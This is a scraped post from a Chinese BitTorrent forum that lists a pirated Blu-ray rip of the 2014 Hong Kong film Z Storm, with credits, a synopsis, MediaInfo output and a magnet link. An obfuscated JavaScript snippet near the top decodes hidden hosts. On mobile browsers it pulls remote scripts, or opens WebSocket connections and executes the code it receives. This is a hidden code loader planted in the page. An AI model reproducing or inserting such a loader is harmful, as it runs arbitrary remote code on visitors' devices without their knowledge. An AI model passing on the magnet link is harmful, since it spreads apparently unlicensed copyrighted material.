反贪风暴[国粤语配音/中文字幕].Z.Storm.2014.1080p.BluRay.x265.10bit.DTS.2Audio 6.34GB

版主小s 16天前 73

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 反贪风暴 / Z风云 / 反贪风暴2014 / Z Storm

◎片 名 Z風暴

◎年 代 2014

◎产 地 中国香港 / 中国大陆

◎类 别 剧情 / 动作 / 犯罪

◎语 言 汉语普通话 / 粤语

◎上映日期 2014-08-16(中国大陆) / 2014-06-19(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt3469440/

◎豆瓣评分 6.1/10 (63973人评价)

◎豆瓣链接 https://movie.douban.com/subject/25792690/

◎片 长 93分钟(中国大陆)

◎导 演 林德禄 David Lam (id:1326068)

◎编 剧 黄浩华 Ho-Wa Wong (id:1340349)

林德禄 David Lam (id:1326068)

◎演 员 古天乐 Louis Koo (id:1027577)

林家栋 Ka Tung Lam (id:1050329)

陈静 Dada Chan (id:1316214)

夏嫣 Sheng (id:1326280)

王敏德 Michael Wong (id:1162139)

卢海鹏 Hoi-Pang Lo (id:1038772)

欧锦棠 Stephen Au (id:1275712)

曾国祥 Derek Tsang (id:1274534)

张兆辉 Siu-Fai Cheung (id:1005843)

骆应钧 Ying Kwan Lok (id:1274577)

廖启智 Kai Chi Liu (id:1274268)

姜皓文 Philip Keung Ho-Man (id:1317884)

何华超 Tony Ho (id:1286723)

张松枝 Deno Cheung (id:1339097)

田学维 Clement Tin (id:1364802)

徐靖雯 Jenny Xu (id:1335618)

王澜霏 Crystal Wang (id:1337572)

吕珊 Rosanne Lui (id:1333242)

张坚庭 Alfred Cheung (id:1016979)

罗冠兰 Koon-Lan Law (id:1289544)

方平 Henry Fong (id:1312822)

张同祖 Tung Cho Cheung (id:1313660)

余达志 Tat-chi Yu (id:1359517)

方志驹 Vernon Fong (id:1378868)

何浩峰 Ho Ho Fung (id:1429098)

苏伟南 Wai-Nam So (id:1433165)

庄澄 John Chong (id:1280710)

林炳坤 Bingkun Lin (id:1350348)

◎标 签 香港 / 犯罪 / 警匪 / 2014 / ICAC / 剧情 / 动作 / 悬疑

◎简 介

商业犯罪搜查科警司黄文彬(林家栋 饰)的妻子前往廉政公署举报丈夫巨额现金来路不明,廉记首席调查主任陆志廉(古天乐 饰)奉命传唤黄到署问话,然而对手老奸巨猾,深谙暗箱一切套路,最终平安脱险。此前不久,黄曾调查素有香港会计界教父之称的罗德永(卢海鹏 饰)未果,视频中二人的反常举止引起陆的怀疑。与此同时,身份难辨的Z基金在道貌岸然的律师胡志勇(王敏德 饰)的推动下即将上市,该基金打着扶贫旗号,有望吸引港府150亿的专项关怀基金投入其中。陆敏感察觉其中的蹊跷,他和同事利用有限的时间展开全面调查。

金钱巨大的诱惑之下,贪婪之徒铤而走险,更不惜为此杀人嗜血。狂扫污秽的Z风暴即将到来,黑云压城城欲摧……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 259391949942457972900646350574834617999 (0xC325128704B6AD8206680A7579730E8F)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.34 GiB

  8. Duration : 1 h 31 min

  9. Overall bit rate : 9 899 kb/s

  10. Encoded date : UTC 2021-09-27 13:46:56

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 31 min

  20. Bit rate : 6 837 kb/s

  21. Width : 1 916 pixels

  22. Height : 804 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.185

  30. Stream size : 4.38 GiB (69%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=16.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.85 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=9 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio #1

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 31 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 510 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 991 MiB (15%)

  50. Title : Cantonese

  51. Language : Chinese

  52. Default : Yes

  53. Forced : No


  54. Audio #2

  55. ID : 3

  56. Format : DTS

  57. Format/Info : Digital Theater Systems

  58. Codec ID : A_DTS

  59. Duration : 1 h 31 min

  60. Bit rate mode : Constant

  61. Bit rate : 1 510 kb/s

  62. Channel(s) : 6 channels

  63. Channel layout : C L R Ls Rs LFE

  64. Sampling rate : 48.0 kHz

  65. Frame rate : 93.750 FPS (512 SPF)

  66. Bit depth : 24 bits

  67. Compression mode : Lossy

  68. Stream size : 991 MiB (15%)

  69. Title : Mandarin

  70. Language : Chinese

  71. Default : No

  72. Forced : No


  73. Text #1

  74. ID : 4

  75. ID in the original source medium : 4609 (0x1201)

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 25 min

  81. Bit rate : 38.1 kb/s

  82. Count of elements : 2428

  83. Stream size : 23.3 MiB (0%)

  84. Title : chs

  85. Language : Chinese

  86. Default : Yes

  87. Forced : No

  88. Original source medium : Blu-ray


  89. Text #2

  90. ID : 5

  91. ID in the original source medium : 4608 (0x1200)

  92. Format : PGS

  93. Muxing mode : zlib

  94. Codec ID : S_HDMV/PGS

  95. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration : 1 h 25 min

  97. Bit rate : 38.7 kb/s

  98. Count of elements : 2428

  99. Stream size : 23.7 MiB (0%)

  100. Title : cht

  101. Language : Chinese

  102. Default : No

  103. Forced : No

  104. Original source medium : Blu-ray


  105. Text #3

  106. ID : 6

  107. ID in the original source medium : 4610 (0x1202)

  108. Format : PGS

  109. Muxing mode : zlib

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 25 min

  113. Bit rate : 43.9 kb/s

  114. Count of elements : 2440

  115. Stream size : 26.8 MiB (0%)

  116. Title : eng

  117. Language : English

  118. Default : No

  119. Forced : No

  120. Original source medium : Blu-ray


  121. Menu

  122. 00:00:00.000 : 第 01 章

  123. 00:07:53.166 : 第 02 章

  124. 00:15:17.833 : 第 03 章

  125. 00:23:08.708 : 第 04 章

  126. 00:30:44.500 : 第 05 章

  127. 00:38:26.916 : 第 06 章

  128. 00:46:57.833 : 第 07 章

  129. 00:53:10.791 : 第 08 章

  130. 00:59:52.583 : 第 09 章

  131. 01:08:31.791 : 第 10 章

  132. 01:17:00.833 : 第 11 章

  133. 01:24:01.958 : 第 12 章




复制代码


TAGS 动作 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:072883F21901A9E09C8E9613185AE1719A7867B8
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖